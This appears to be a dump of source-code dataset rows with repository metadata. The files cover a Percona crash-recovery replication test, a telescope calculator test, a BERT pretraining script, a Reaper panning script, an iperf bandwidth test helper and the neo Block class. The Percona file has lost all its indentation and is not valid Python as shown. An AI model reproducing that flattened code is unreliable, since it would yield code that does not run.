jonzobrist/Percona-Server-5.1 | kewpie/percona_tests/innodbCrash/innodbCrash2_test.py | 1 | 5311 | #! /usr/bin/env python
# -*- mode: python; indent-tabs-mode: nil; -*-
# vim:expandtab:shiftwidth=2:tabstop=2:smarttab:
#
# Copyright (C) 2011 Patrick Crews
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import signal
import threading
import time
from percona_tests.innodbCrash.innodbCrashTestCase import innodbCrashTestCase
from percona_tests.innodbCrash import suite_config
server_requirements = suite_config.server_requirements
server_requests = suite_config.server_requests
servers = suite_config.servers
test_executor = suite_config.test_executor
class Worker(threading.Thread):
def __init__( self
, xid
, thread_desc
, time_delay
, test_executor
, server
, logging):
threading.Thread.__init__(self)
self.server = server
self.xid = xid
self.desc = thread_desc
self.time_delay = time_delay
self.test_executor = test_executor
self.logging = logging
self.start()
def finish(self):
return
def run(self):
try:
self.logging.test_debug( "Will crash after:%d seconds" %(self.time_delay))
time.sleep(self.time_delay)
pid = None
timeout = self.time_delay*6
decrement = .25
while not pid and timeout:
pid = self.server.get_pid()
time.sleep(decrement)
timeout -= decrement
self.logging.test_debug( "Crashing server: port: %s, pid: %s" %(self.server.master_port, pid))
try:
os.kill(int(self.server.pid), signal.SIGKILL)
self.logging.test_debug( "Killed server pid: %s" %pid)
except OSError, e:
self.logging.test_debug( "Didn't kill server pid: %s" %pid)
self.logging.test_debug( e)
except Exception, e:
print "caught (%s)" % e
finally:
self.finish()
class basicTest(innodbCrashTestCase):
""" This test case creates a master-slave pair
then generates a randgen load against the master
The master server is killed after %kill_db_after seconds
and restarted. We restart the slave, then ensure
the master and slave have matching table checksums once
they are synced and the test load is stopped
"""
def test_crash(self):
self.initialize(test_executor, servers, suite_config)
workers = []
# create our table
self.test_bed_cmd = "./gendata.pl --spec=conf/percona/percona_no_blob.zz "
self.create_test_bed()
# generate our workload via randgen
test_seq = [ "./gentest.pl"
, "--grammar=conf/percona/translog_concurrent1.yy"
, "--queries=%d" %(self.randgen_queries_per_thread)
, "--threads=%d" %(self.randgen_threads)
, "--sqltrace"
, "--debug"
, "--seed=%s" %(self.randgen_seed)
]
while self.crashes:
self.logging.test_debug( "Crashes remaining: %d" %(self.crashes))
self.crashes -= 1
worker = Worker( 1
, 'time_delay_kill_thread'
, self.kill_db_after
, self.test_executor
, self.master_server
, self.logging
)
workers.append(worker)
randgen_process = self.get_randgen_process(test_seq, self.test_executor, self.master_server)
#if not self.master_server.ping(quiet=True) and (randgen_process.poll() is None):
# Our server is dead, but randgen is running, we kill it to speed up testing
#randgen_process.send_signal(signal.SIGINT)
for w in workers:
w.join()
time.sleep(2)
while not randgen_process.poll():
randgen_process.send_signal(signal.SIGINT)
retcode = self.master_server.start()
timeout = 300
decrement = 1
while timeout and not self.master_server.ping(quiet=True):
time.sleep(decrement)
timeout -= decrement
self.slave_server.slave_stop()
self.slave_server.slave_start()
self.master_server.wait_sync_with_slaves([self.slave_server],timeout=60)
result = self.check_slaves_by_checksum(self.master_server,[self.slave_server])
self.assertEqual(result,None,msg=result)
| bsd-3-clause | -8,189,090,280,763,392,000 | 36.935714 | 106 | 0.585577 | false |
eaobservatory/hedwig | test/test_jcmt_calc_s2.py | 1 | 4087 | # Copyright (C) 2017 East Asian Observatory
# All Rights Reserved.
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful,but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,51 Franklin
# Street, Fifth Floor, Boston, MA 02110-1301, USA
from __future__ import absolute_import, division, print_function, \
unicode_literals
from hedwig.facility.jcmt.calculator_scuba2 import SCUBA2Calculator
from .base_calculator import CalculatorTestCase
expect = {
SCUBA2Calculator.CALC_TIME: {
2: {
'input': 'pos pos_type tau map samp pix850 pix450 wl rms',
'output': 'time',
},
1: {
'input': 'pos pos_type tau map mf pix850 pix450 wl rms',
'output': 'time',
},
},
SCUBA2Calculator.CALC_RMS: {
2: {
'input': 'pos pos_type tau map samp pix850 pix450 time',
'output': 'rms_850 rms_450',
},
1: {
'input': 'pos pos_type tau map mf pix850 pix450 time',
'output': 'rms_850 rms_450',
},
},
}
conversions = [
('time w/ mf', SCUBA2Calculator.CALC_TIME, {
1: {
'map': 'daisy',
'pos': 65.43,
'pos_type': 'dec',
'tau': 0.040,
'pix850': None,
'pix450': None,
'mf': True,
'wl': 850,
'rms': 1.5,
},
2: {
'map': 'daisy',
'pos': 65.43,
'pos_type': 'dec',
'tau': 0.040,
'samp': 'mf',
'pix850': None,
'pix450': None,
'wl': 850,
'rms': 1.5,
}
}),
('time w/o mf', SCUBA2Calculator.CALC_TIME, {
1: {
'map': 'daisy',
'pos': 22.22,
'pos_type': 'zen',
'tau': 0.080,
'pix850': 8,
'pix450': 4,
'mf': False,
'wl': 850,
'rms': 1.5,
},
2: {
'map': 'daisy',
'pos': 22.22,
'pos_type': 'zen',
'tau': 0.080,
'samp': 'custom',
'pix850': 8,
'pix450': 4,
'wl': 850,
'rms': 1.5,
},
}),
('rms w/ mf', SCUBA2Calculator.CALC_RMS, {
1: {
'map': 'pong1800',
'pos': 1.2345,
'pos_type': 'am',
'tau': 0.123,
'pix850': None,
'pix450': None,
'mf': True,
'time': 4.5,
},
2: {
'map': 'pong1800',
'pos': 1.2345,
'pos_type': 'am',
'tau': 0.123,
'samp': 'mf',
'pix850': None,
'pix450': None,
'time': 4.5,
},
}),
('rms w/o mf', SCUBA2Calculator.CALC_RMS, {
1: {
'map': 'pong900',
'pos': 72.25,
'pos_type': 'el',
'tau': 0.0987,
'pix850': 13,
'pix450': 8,
'mf': False,
'time': 2.76,
},
2: {
'map': 'pong900',
'pos': 72.25,
'pos_type': 'el',
'tau': 0.0987,
'samp': 'custom',
'pix850': 13,
'pix450': 8,
'time': 2.76,
},
}),
]
class JCMTS2CalcTestCase(CalculatorTestCase):
calculator_class = SCUBA2Calculator
def test_basic(self):
self._test_basic(expect)
def test_convert_version(self):
self._test_convert_version(conversions)
| gpl-3.0 | -2,924,925,457,265,718,000 | 25.031847 | 79 | 0.457793 | false |
tombstone/models | official/nlp/bert/run_pretraining.py | 1 | 7381 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Run masked LM/next sentence pre-training for BERT in TF 2.x."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from absl import logging
import gin
import tensorflow as tf
from official.modeling import performance
from official.nlp import optimization
from official.nlp.bert import bert_models
from official.nlp.bert import common_flags
from official.nlp.bert import configs
from official.nlp.bert import input_pipeline
from official.nlp.bert import model_training_utils
from official.utils.misc import distribution_utils
flags.DEFINE_string('input_files', None,
'File path to retrieve training data for pre-training.')
# Model training specific flags.
flags.DEFINE_integer(
'max_seq_length', 128,
'The maximum total input sequence length after WordPiece tokenization. '
'Sequences longer than this will be truncated, and sequences shorter '
'than this will be padded.')
flags.DEFINE_integer('max_predictions_per_seq', 20,
'Maximum predictions per sequence_output.')
flags.DEFINE_integer('train_batch_size', 32, 'Total batch size for training.')
flags.DEFINE_integer('num_steps_per_epoch', 1000,
'Total number of training steps to run per epoch.')
flags.DEFINE_float('warmup_steps', 10000,
'Warmup steps for Adam weight decay optimizer.')
flags.DEFINE_bool('use_next_sentence_label', True,
'Whether to use next sentence label to compute final loss.')
flags.DEFINE_bool('train_summary_interval', 0, 'Step interval for training '
'summaries. If the value is a negative number, '
'then training summaries are not enabled.')
common_flags.define_common_bert_flags()
FLAGS = flags.FLAGS
def get_pretrain_dataset_fn(input_file_pattern, seq_length,
max_predictions_per_seq, global_batch_size,
use_next_sentence_label=True):
"""Returns input dataset from input file string."""
def _dataset_fn(ctx=None):
"""Returns tf.data.Dataset for distributed BERT pretraining."""
input_patterns = input_file_pattern.split(',')
batch_size = ctx.get_per_replica_batch_size(global_batch_size)
train_dataset = input_pipeline.create_pretrain_dataset(
input_patterns,
seq_length,
max_predictions_per_seq,
batch_size,
is_training=True,
input_pipeline_context=ctx,
use_next_sentence_label=use_next_sentence_label)
return train_dataset
return _dataset_fn
def get_loss_fn():
"""Returns loss function for BERT pretraining."""
def _bert_pretrain_loss_fn(unused_labels, losses, **unused_args):
return tf.reduce_mean(losses)
return _bert_pretrain_loss_fn
def run_customized_training(strategy,
bert_config,
init_checkpoint,
max_seq_length,
max_predictions_per_seq,
model_dir,
steps_per_epoch,
steps_per_loop,
epochs,
initial_lr,
warmup_steps,
end_lr,
optimizer_type,
input_files,
train_batch_size,
use_next_sentence_label=True,
train_summary_interval=0,
custom_callbacks=None):
"""Run BERT pretrain model training using low-level API."""
train_input_fn = get_pretrain_dataset_fn(input_files, max_seq_length,
max_predictions_per_seq,
train_batch_size,
use_next_sentence_label)
def _get_pretrain_model():
"""Gets a pretraining model."""
pretrain_model, core_model = bert_models.pretrain_model(
bert_config, max_seq_length, max_predictions_per_seq,
use_next_sentence_label=use_next_sentence_label)
optimizer = optimization.create_optimizer(
initial_lr, steps_per_epoch * epochs, warmup_steps,
end_lr, optimizer_type)
pretrain_model.optimizer = performance.configure_optimizer(
optimizer,
use_float16=common_flags.use_float16(),
use_graph_rewrite=common_flags.use_graph_rewrite())
return pretrain_model, core_model
trained_model = model_training_utils.run_customized_training_loop(
strategy=strategy,
model_fn=_get_pretrain_model,
loss_fn=get_loss_fn(),
scale_loss=FLAGS.scale_loss,
model_dir=model_dir,
init_checkpoint=init_checkpoint,
train_input_fn=train_input_fn,
steps_per_epoch=steps_per_epoch,
steps_per_loop=steps_per_loop,
epochs=epochs,
sub_model_export_name='pretrained/bert_model',
train_summary_interval=train_summary_interval,
custom_callbacks=custom_callbacks)
return trained_model
def run_bert_pretrain(strategy, custom_callbacks=None):
"""Runs BERT pre-training."""
bert_config = configs.BertConfig.from_json_file(FLAGS.bert_config_file)
if not strategy:
raise ValueError('Distribution strategy is not specified.')
# Runs customized training loop.
logging.info('Training using customized training loop TF 2.0 with distributed'
'strategy.')
performance.set_mixed_precision_policy(common_flags.dtype())
return run_customized_training(
strategy,
bert_config,
FLAGS.init_checkpoint, # Used to initialize only the BERT submodel.
FLAGS.max_seq_length,
FLAGS.max_predictions_per_seq,
FLAGS.model_dir,
FLAGS.num_steps_per_epoch,
FLAGS.steps_per_loop,
FLAGS.num_train_epochs,
FLAGS.learning_rate,
FLAGS.warmup_steps,
FLAGS.end_lr,
FLAGS.optimizer_type,
FLAGS.input_files,
FLAGS.train_batch_size,
FLAGS.use_next_sentence_label,
FLAGS.train_summary_interval,
custom_callbacks=custom_callbacks)
def main(_):
gin.parse_config_files_and_bindings(FLAGS.gin_file, FLAGS.gin_param)
if not FLAGS.model_dir:
FLAGS.model_dir = '/tmp/bert20/'
strategy = distribution_utils.get_distribution_strategy(
distribution_strategy=FLAGS.distribution_strategy,
num_gpus=FLAGS.num_gpus,
tpu_address=FLAGS.tpu)
if strategy:
print('***** Number of cores used : ', strategy.num_replicas_in_sync)
run_bert_pretrain(strategy)
if __name__ == '__main__':
app.run(main)
| apache-2.0 | -6,846,756,583,402,169,000 | 36.467005 | 80 | 0.637583 | false |
junh1024/Reaper-Surround | Scripts/SetPanAccordingToName.py | 1 | 1858 | #Some Codes from "Rename tracks to take source filename", -- Set pan for selected track(s) (SPK77)
#This script by junh1024 sets pans of tracks according to their suffixes. Useful for say, film dialogue. See global variables below for pans.
from reaper_python import *
from contextlib import contextmanager
# import os
@contextmanager
def undoable(message):
RPR_Undo_BeginBlock2(0)
try:
yield
finally:
RPR_Undo_EndBlock2(0, message, -1)
debug = True #disable for using
def msg(m):
if 'debug' in globals():
RPR_ShowConsoleMsg(m)
#Track suffixes
L=-0.15 #initial Left pan, everything else is derived modularly. Change to taste.
R=-L
LW=2*L
RW=-LW
LC=(2*L)/3
RC=-LC
#these have parenting set later on
SL=-1
SR=-SL
RR=C=0 #last 2 of naRR,center pans
# msg(L)
# msg(R)
# msg(LW)
# msg(RW)
# msg(LC)
# msg(RC)
with undoable("Set Pan According To Track Suffix"):
# for i in range(RPR_CountTracks(0)): #for all tracks, get track
# trackId = RPR_GetTrack(0, i)
for i in range(RPR_CountSelectedTracks(0)): #for selected tracks, get track
trackId = RPR_GetSelectedTrack(0, i)
suffix = str(RPR_GetSetMediaTrackInfo_String(trackId, "P_NAME", "", False )[3] )[-2:].lstrip().upper() #get actual track name, last 2 chars, remove whitespace)
if(suffix==''):
continue
if(suffix[0] == 'S'): #anything rear/surround. I'm not doing else cuz there may be top pans.
RPR_SetMediaTrackInfo_Value(trackId, "C_MAINSEND_OFFS", 4) #set parent ch 5/6 rear/surround
if(suffix in globals()): #if a suffix is one of the global preset pans, see global variables above
RPR_SetMediaTrackInfo_Value(trackId, "D_PAN", eval(suffix)) #set it according to the pan designated by the suffix REFLECTION USED
if(suffix in ('C,RR,L,R,LW,RW,LC,RC'.split(','))): #anything front
RPR_SetMediaTrackInfo_Value(trackId, "C_MAINSEND_OFFS", 0)
| gpl-3.0 | 5,251,573,571,839,216,000 | 27.584615 | 161 | 0.705597 | false |
yassen-itlabs/py-linux-traffic-control | tests/util/iperf_proc.py | 1 | 7324 | """
Iperf network performance testing module.
Used by tests for simple bandwidth measurements; uses iperf.
"""
import time
from pyltc.util.cmdline import CommandLine
# FIXME: Do we need these? Remove if not.
OUTPUT_REGEXP = r'^\[.*?\]\s+\d+\.\d+\-\d+\.\d+\s+sec\s+\d[\.\d]+\s+\w+\s+(\d+)\s+bits/sec.*$'
TIMEOUT = 60
class Iperf3Server(object):
"""Used for running iperf server component
iperf3 -s 127.0.0.1 -p 5005 -1 -i 0 -f b
iperf -[u]s -B 127.0.0.1 -p 9003 -f b"""
def __init__(self, iperf_bin='iperf', host='127.0.0.1', port=5001):
self._iperf_bin = iperf_bin
self._host = host
self._port = port
self.cmd = None
self.thread = None
def run(self, protocol):
cmd_tmpl = "{} -s -B {} -p {} -f b -y C" if protocol == 'tcp' else "{} -us -B {} -p {} -f b -y C"
cmd_text = cmd_tmpl.format(self._iperf_bin, self._host, self._port)
print('cmd_text(server): {!r}'.format(cmd_text))
self.cmd = CommandLine(cmd_text)
self.cmd.execute_daemon()
return self.cmd
def join(self): # TODO: Perhaps not used anymore?
self.thread.join()
class Iperf3Client(object):
"""Parent of TCPClient and UDPClient"""
def __init__(self, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
self._iperf_bin = iperf_bin
self._host = host
self._port = port
self._duration = duration
class TCPClient(Iperf3Client):
"""Used for running iperf client component in TCP mode.
iperf3 -s 127.0.0.1 -p 5005 -1 -i 0 -f b
iperf -[u]s -B 127.0.0.1 -p 9003 -f b"""
def __init__(self, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
super(TCPClient, self).__init__(iperf_bin=iperf_bin, host=host, port=port, duration=duration)
def run(self):
cmd_text = "{} -c {} -p {} -t {} -f b".format(self._iperf_bin, self._host, self._port, self._duration)
print('cmd_text(tcpclient): {!r}'.format(cmd_text))
self.cmd = CommandLine(cmd_text).execute_daemon()
return self.cmd
class UDPClient(Iperf3Client):
"""Used for running iperf client component in TCP mode.
iperf3 -s 127.0.0.1 -p 5005 -1 -i 0 -f b
iperf -[u]s -B 127.0.0.1 -p 9003 -f b"""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
super(UDPClient, self).__init__(iperf_bin=iperf_bin, host=host, port=port, duration=duration)
self._sendrate = sendrate
def run(self):
cmd_text = "{} -uc {} -p {} -t {} -f b -b {}".format(self._iperf_bin, self._host, self._port, self._duration, self._sendrate)
print('cmd_text(udpclient): {!r}'.format(cmd_text))
self.cmd = CommandLine(cmd_text).execute_daemon()
return self.cmd
class NetPerfTest(object):
"""Parent of TCPNetPerfTest and UDPNetPerfTest,
which wrap the iperf server-client functionallity."""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
self._sendrate = sendrate
self._iperf_bin = iperf_bin
self._ip = host
self._port = port
self._duration = duration
def _gather_server_output(self, server_cmd, client_cmd):
output_line = None
with server_cmd._proc.stdout:
for line in iter(server_cmd._proc.stdout.readline, b''):
if line:
output_line = line
rc = server_cmd.terminate()
if rc != None:
break
print('Unexpected None returncode after kill()!..')
server_cmd._proc.stderr.close()
client_cmd._proc.stdout.close()
client_cmd._proc.stderr.close()
assert output_line, 'No output from iperf server! cmdline: {}'.format(server_cmd.cmdline)
return output_line
def run(self):
raise NotImplemented('Abstract method.')
class TCPNetPerfTest(NetPerfTest):
"""Wraps the iperf server-client functionallity for tcp."""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
"""``sendrate`` is only a dummy argument here, to conform to NetPerfTest interface."""
super(TCPNetPerfTest, self).__init__('dummy', iperf_bin=iperf_bin, host=host, port=port, duration=duration)
def run(self):
server = Iperf3Server(iperf_bin=self._iperf_bin, host=self._ip, port=self._port)
server_cmd = server.run("tcp")
time.sleep(0.1)
client = TCPClient(iperf_bin=self._iperf_bin, host=self._ip, port=self._port, duration=self._duration)
client_cmd = client.run()
output_line = self._gather_server_output(server_cmd, client_cmd)
return int(output_line.split(b',')[8])
class UDPNetPerfTest(NetPerfTest):
"""Wraps the iperf server-client functionallity for udp."""
def __init__(self, sendrate, iperf_bin='iperf', host='127.0.0.1', port=5001, duration=4):
super(UDPNetPerfTest, self).__init__(sendrate, iperf_bin=iperf_bin, host=host, port=port, duration=duration)
def run(self):
server = Iperf3Server(iperf_bin=self._iperf_bin, host=self._ip, port=self._port)
server_cmd = server.run("udp")
time.sleep(0.1)
client = UDPClient(self._sendrate, iperf_bin=self._iperf_bin, host=self._ip, port=self._port, duration=self._duration)
client_cmd = client.run()
output_line = self._gather_server_output(server_cmd, client_cmd)
return int(output_line.split(b',')[8])
#________________________________________
# Test Section Below TODO: Make sure these are also executed on each build
import unittest
class ServerClientTest(unittest.TestCase):
def test_creation(self):
Iperf3Server(iperf_bin='iperf_bin3', host='127.0.0.3', port=30300)
TCPClient(iperf_bin='iperf_bin4', host='127.0.0.4', port=40400, duration=44)
UDPClient('10mbit', iperf_bin='iperf_bin5', host='127.0.0.5', port=50500, duration=55)
@unittest.skip("sould be removed/reworked") # TODO: rework or remove
def test_simple(self): # seems unusable at this point
server = Iperf3Server(iperf_bin='iperf', host='127.0.0.1', port=40400)
server.run("tcp")
time.sleep(0.1)
client = TCPClient(iperf_bin='iperf', host='127.0.0.1', port=40400, duration=4)
client.run()
server.join()
bandwidth = server.get_bandwidth()
print(bandwidth)
class TestNetPerfTest(unittest.TestCase):
def test_creation(self):
TCPNetPerfTest('dummy', iperf_bin='iperf_bin7', host='127.0.0.7', port=7700, duration=77)
UDPNetPerfTest('8mbit', iperf_bin='iperf_bin8', host='127.0.0.8', port=8800, duration=88)
def test_tcp(self):
tcp_netperf = TCPNetPerfTest('dummy', host='127.0.0.1', port=18003, duration=3)
bandwidth = tcp_netperf.run()
print(bandwidth)
def test_tcp_2(self):
tcp_netperf = TCPNetPerfTest('dummy', host='127.0.0.1', port=8003, duration=3)
bandwidth = tcp_netperf.run()
print(bandwidth)
def test_udp(self):
udp_netperf = UDPNetPerfTest('10mbit', host='127.0.0.1', port=17007, duration=3)
bandwidth = udp_netperf.run()
print(bandwidth)
if __name__ == '__main__':
unittest.main()
| mit | -6,457,629,180,857,245,000 | 36.177665 | 133 | 0.608957 | false |
rgerkin/python-neo | neo/core/block.py | 1 | 5206 | # -*- coding: utf-8 -*-
'''
This module defines :class:`Block`, the main container gathering all the data,
whether discrete or continous, for a given recording session. base class
used by all :module:`neo.core` classes.
:class:`Block` derives from :class:`Container`,
from :module:`neo.core.container`.
'''
# needed for python 3 compatibility
from __future__ import absolute_import, division, print_function
from datetime import datetime
from neo.core.container import Container, unique_objs
class Block(Container):
'''
Main container gathering all the data, whether discrete or continous, for a
given recording session.
A block is not necessarily temporally homogeneous, in contrast to :class:`Segment`.
*Usage*::
>>> from neo.core import (Block, Segment, ChannelIndex,
... AnalogSignal)
>>> from quantities import nA, kHz
>>> import numpy as np
>>>
>>> # create a Block with 3 Segment and 2 ChannelIndex objects
,,, blk = Block()
>>> for ind in range(3):
... seg = Segment(name='segment %d' % ind, index=ind)
... blk.segments.append(seg)
...
>>> for ind in range(2):
... chx = ChannelIndex(name='Array probe %d' % ind,
... index=np.arange(64))
... blk.channel_indexes.append(chx)
...
>>> # Populate the Block with AnalogSignal objects
... for seg in blk.segments:
... for chx in blk.channel_indexes:
... a = AnalogSignal(np.random.randn(10000, 64)*nA,
... sampling_rate=10*kHz)
... chx.analogsignals.append(a)
... seg.analogsignals.append(a)
*Required attributes/properties*:
None
*Recommended attributes/properties*:
:name: (str) A label for the dataset.
:description: (str) Text description.
:file_origin: (str) Filesystem path or URL of the original data file.
:file_datetime: (datetime) The creation date and time of the original
data file.
:rec_datetime: (datetime) The date and time of the original recording.
*Properties available on this object*:
:list_units: descends through hierarchy and returns a list of
:class:`Unit` objects existing in the block. This shortcut exists
because a common analysis case is analyzing all neurons that
you recorded in a session.
Note: Any other additional arguments are assumed to be user-specific
metadata and stored in :attr:`annotations`.
*Container of*:
:class:`Segment`
:class:`ChannelIndex`
'''
_container_child_objects = ('Segment', 'ChannelIndex')
_child_properties = ('Unit',)
_recommended_attrs = ((('file_datetime', datetime),
('rec_datetime', datetime),
('index', int)) +
Container._recommended_attrs)
_repr_pretty_attrs_keys_ = (Container._repr_pretty_attrs_keys_ +
('file_origin', 'file_datetime',
'rec_datetime', 'index'))
_repr_pretty_containers = ('segments',)
def __init__(self, name=None, description=None, file_origin=None,
file_datetime=None, rec_datetime=None, index=None,
**annotations):
'''
Initalize a new :class:`Block` instance.
'''
super(Block, self).__init__(name=name, description=description,
file_origin=file_origin, **annotations)
self.file_datetime = file_datetime
self.rec_datetime = rec_datetime
self.index = index
self.regionsofinterest = [] # temporary workaround.
# the goal is to store all sub-classes of RegionOfInterest in a single list
# but this will need substantial changes to container handling
@property
def data_children_recur(self):
'''
All data child objects stored in the current object,
obtained recursively.
'''
# subclassing this to remove duplicate objects such as SpikeTrain
# objects in both Segment and Unit
# Only Block can have duplicate items right now, so implement
# this here for performance reasons.
return tuple(unique_objs(super(Block, self).data_children_recur))
def list_children_by_class(self, cls):
'''
List all children of a particular class recursively.
You can either provide a class object, a class name,
or the name of the container storing the class.
'''
# subclassing this to remove duplicate objects such as SpikeTrain
# objects in both Segment and Unit
# Only Block can have duplicate items right now, so implement
# this here for performance reasons.
return unique_objs(super(Block, self).list_children_by_class(cls))
@property
def list_units(self):
'''
Return a list of all :class:`Unit` objects in the :class:`Block`.
'''
return self.list_children_by_class('unit')
| bsd-3-clause | -1,240,157,085,246,349,600 | 37.562963 | 87 | 0.599116 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.